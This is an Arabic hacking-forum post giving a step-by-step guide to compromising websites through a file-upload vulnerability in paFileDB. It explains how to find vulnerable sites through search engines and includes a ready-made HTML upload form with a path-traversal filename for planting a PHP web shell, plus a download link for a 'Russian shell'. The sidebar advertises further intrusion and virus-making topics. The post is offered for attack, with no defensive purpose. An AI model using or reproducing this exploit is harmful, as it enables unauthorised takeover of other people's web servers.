الرئيسيةالرئيسية  البوابةالبوابة  أحدث الصورأحدث الصور  التسجيلالتسجيل  دخولدخول  

بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
المواضيع الأخيرة
» شرح اختراق مواقع بثغرة news/news.mdb
ثغرة جديدة وقوية Icon_minitimeالأربعاء 30 يوليو - 3:21 من طرف Admin

» ثغرة wiz Journal
ثغرة جديدة وقوية Icon_minitimeالأربعاء 30 يوليو - 3:18 من طرف Admin

» شرح شغرة الفرونت بيج
ثغرة جديدة وقوية Icon_minitimeالأربعاء 30 يوليو - 3:04 من طرف Admin

» لو متخانق مع صحبك وعاوز تعلمة الادب ادخل هنا وانت تعرف ازاى
ثغرة جديدة وقوية Icon_minitimeالثلاثاء 29 يوليو - 3:21 من طرف Admin

» اصنع فايرس واغلق جهاز كل من معك على الشبكة حتى ولو كان ADMAIN
ثغرة جديدة وقوية Icon_minitimeالثلاثاء 29 يوليو - 3:14 من طرف Admin

» أول موقع لتسجيل الإختراقات
ثغرة جديدة وقوية Icon_minitimeالثلاثاء 29 يوليو - 3:04 من طرف Admin

» اختراق منتديات vb
ثغرة جديدة وقوية Icon_minitimeالثلاثاء 29 يوليو - 3:01 من طرف Admin

» برنامج المسنجر المزور (اخترق ومحد داريفيكـ) اتحداك اذا ما اخترقت
ثغرة جديدة وقوية Icon_minitimeالإثنين 28 يوليو - 8:33 من طرف Admin

» شرح فيديو صوت وصوره لكيفيه صنع برنامج ارسال ايميلات (مضمونه 100%100)
ثغرة جديدة وقوية Icon_minitimeالإثنين 28 يوليو - 8:30 من طرف Admin

التبادل الاعلاني
ثغرة جديدة وقوية
ثغرة جديدة وقوية Icon_minitimeالأربعاء 23 يوليو - 6:07 من طرف Admin
بسم الله الرحمن الرحيم اما بعد
سأضع اليوم ثغرة قوية ومصاب بها كثير من المنتديات
السلام علكم

قبل ما اطرح الموضوع

بقولكم انتو اتعرفون ثغرة دليل البرامج

بهذه الثغرة ترفع شل وتخترق الموقع

بس المشكله الي كانت امخربه على الثغرة انك بعد ما ترفع الشل ما تستفيد منه لان الموقع سيف مود

بحط لكم شرح حق الثغره موجود عندي من زمان والله ما اذكر حتي منو كاتب الموضوع

وبعد الشرح بشرح لكم كيفية حل مشكله السيف مود

اقتباس:



شرح ثغرة دليل البرامج

مفيده لرفع الشيل



الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل.
============
(البرامج المصابه)
PHP Arena paFileDB 1.1.3
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 3.1
============
أذهب إلى أي محرك بحث منثل جوجل
وأكتب أيا من البرامج السابقة مثلا:
PHP Arena paFileDB 3.1
راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال:
http://www.truez.com/download
نضيف عليه هالوصلة:
includes/team/file.php
ليصبح:
http://www.truez.com/download/includes/team/file.php
الأن ضع اللنك في المتصفح وأضغط أنتر:
إذا طلع لك هكذا
[ ] - [ ] - [ ]
يعني الموقع مصاب بالثغرة.
الأن لرفع ملف إلى الموقع نتبع الخطوات التالية:
1- نعمل مجلد على القرص C: ونسميه مثلا: Virus
2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php
3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html:
======================
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://www.truez.com/download/includes/team/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/777.php"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
======================
مع مراعاة تغيير:
http://www.truez.com/download/includes/team/file.php
إلى الموقع المصاب.
و
777.php
إلى إسم الملف (أتركه كما هو لأنه نحن غيرنا أسمه إلى (777
4- الأن أفتح الصفحة بالمستعرض Internet Explorer وفي الفراغ الأول أختار الملف 777.php الذي كنا نريد ترفيعه ثم أضغط على doit عندها سينتقل الملف إلى الموقع عن طريق الثغرة.
ويمكننا أستعراضه من هذا اللنك:
http://www.truez.com/download/uploads/777.php


وصلة تحميل الشل الروسي

http://cgi.outlaw.plus.com/pafiledb/...oexecshell.zip

حبيت اقول لكم شي

تقدرون تستفدون من هذا الشي بشيين

اول شي : تخترقون موقع حتي لو كان فيه سيف مود

ثاني شي : يكون عندك مركز لتحميل الملفات خاص فيكم

تعاليق: 0
احصائيات
هذا المنتدى يتوفر على 11 عُضو.
آخر عُضو مُسجل هو hhhhhhhhhhhaaaaa فمرحباً به.

أعضاؤنا قدموا 45 مساهمة في هذا المنتدى في 41 موضوع
منتدى
المتواجدون الآن ؟
ككل هناك 1 عُضو حالياً في هذا المنتدى :: 0 عضو مُسجل, 0 عُضو مُختفي و 1 زائر

لا أحد

أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 9 بتاريخ الأربعاء 17 أكتوبر - 1:37